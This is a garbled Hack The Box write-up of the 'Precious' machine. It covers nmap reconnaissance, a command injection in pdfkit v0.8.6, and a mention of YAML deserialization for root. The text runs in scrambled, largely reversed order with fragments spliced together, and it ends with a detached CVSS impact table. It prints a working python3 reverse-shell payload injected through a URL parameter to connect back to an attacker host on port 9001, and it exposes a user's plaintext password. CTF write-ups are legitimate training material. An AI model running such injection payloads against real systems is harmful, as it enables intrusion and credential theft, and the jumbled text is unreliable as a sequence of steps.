![]() BUNDLE_HTTPS : / / RUBYGEMS_ORG / : "henry:Q3c1AqGHtoI0aXAYFH"īefore running linPeas I like to check manually r -xr -xr -x 1 root ruby 62 Sep 26 05 : 04 config bundle drwxr -xr -x 4 ruby ruby 4096 Nov 26 19 : 56. bashrc dr -xr -xr -x 2 root ruby 4096 Oct 26 08 : 28. bash_logout -rw -r -r - 1 ruby ruby 3526. bash_history - > /dev / null -rw -r -r - 1 ruby ruby 220. Total 28 drwxr -xr -x 4 ruby ruby 4096 Nov 26 14 : 36. bundle which has the henry user password in it. In the ruby user directory, I found a folder called. org /ncat ) Ncat : Listening on : : : 9001 Ncat : Listening on 0.0. XX /?name = % 20`python3 -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.XX.XX",9001)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) import pty pty.spawn("sh")'`Īnd we got the rev shell as ruby user ❯ nc -nvlp 9001 Ncat : Version 7.93 ( https : / /nmap. Let's use the python3 payload to get the rev shell http : // 10.10. Let's input that and check any changes in the outputĪnd as per the command id we got the user info Searching that on Google I find a command injection vulnerabilityĪfter reading the POC I got to known that we can use any get parameter name and inside that use the backticks to injection our command. ![]() server 80Īnd it's converted the webpage into PDF as expected, let's download the PDFĪnalyzing the PDF, we're going to known that it's using pdfkit v0.8.6. Let's quickly spin up the python3 web server ❯ python3 -m http. There is a simple web page convertor which take the URL as input and give the PDF as output : : 1 localhost ip6 -localhost ip6 -loopback htb # The following lines are desirable for IPv6 capable hosts Let's quickly add that in /etc/hosts file ❯ cat /etc /hostsġ0.10. Nmap reveals that 80 and 22 ports are open and 80 port redirect us to precious.htb Nmap done : 1 IP address ( 1 host up ) scanned in 10.39 seconds Please report any incorrect results at https : / /nmap. 0 Service Info : OS : Linux CPE : cpe : /o :linux :linux_kernel htb / |_http -server -header : nginx / 1.18. 0 |_http -title : Did not follow redirect to http : / / precious. Not shown : 998 closed tcp ports (conn -refused ) PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 8. 189 Starting Nmap 7.93 ( https : / /nmap. Nmap ❯ nmap -sC -sV -oA nmap /result 10.10. Using that, get the rev shell, and for privilege escalation, use code execution through yaml deserialization attack. On this machine, first we got the web service which converts the web-page to a PDF, which is vulnerable to command injection. Not required (Authentication is not required to exploit the vulnerability.Hackthebox released a new machine called precious. Very little knowledge or skill is required to exploit. Low (Specialized access conditions or extenuating circumstances do not exist. Partial (There is reduced performance or interruptions in resource availability.) Partial (Modification of some system files or information is possible, but the attacker does not have control over what can be modified, or the scope of what the attacker can affect is limited.) Partial (There is considerable informational disclosure.)
0 Comments
Leave a Reply. |